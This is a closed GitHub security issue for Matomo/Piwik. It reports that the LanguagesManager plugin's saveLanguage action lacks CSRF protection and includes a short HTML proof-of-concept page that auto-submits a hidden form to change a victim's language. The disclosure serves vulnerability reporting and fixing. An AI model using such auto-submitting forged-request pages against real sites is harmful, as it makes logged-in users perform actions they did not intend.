CSRF in LanguagesManager-Plugin #3738
Labels
Bug
For errors / faults / flaws / inconsistencies etc.
c: Security
For issues that make Matomo more secure. Please report issues through HackerOne and not in Github.
duplicate
For issues that already existed in our issue tracker and were reported previously.
Major
Indicates the severity or impact or benefit of an issue is much higher than normal but not critical.
Milestone
Comments
This issue was closed.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
The LanguagesManager-Plugin is vulnerable to Cross Site Request Forgery.
The saveLanguage-Function is not checking the token_auth-Variable, nor there is any Protection against CSRF.
A short PoC-Script:
<html><head><title>Piwik CRSF PoC</title> </head> <body> <form name="test" action="http://localhost/index.php?module=LanguagesManager&action=saveLanguage" method="post">
<!--change the URL in action-attribute--> <input type="hidden"
name="language" value='ar'> <!--replace the value with any
possible language file, for example de,en,ar--> </form>
<script>document.test.submit();</script> </body> </html>
The text was updated successfully, but these errors were encountered: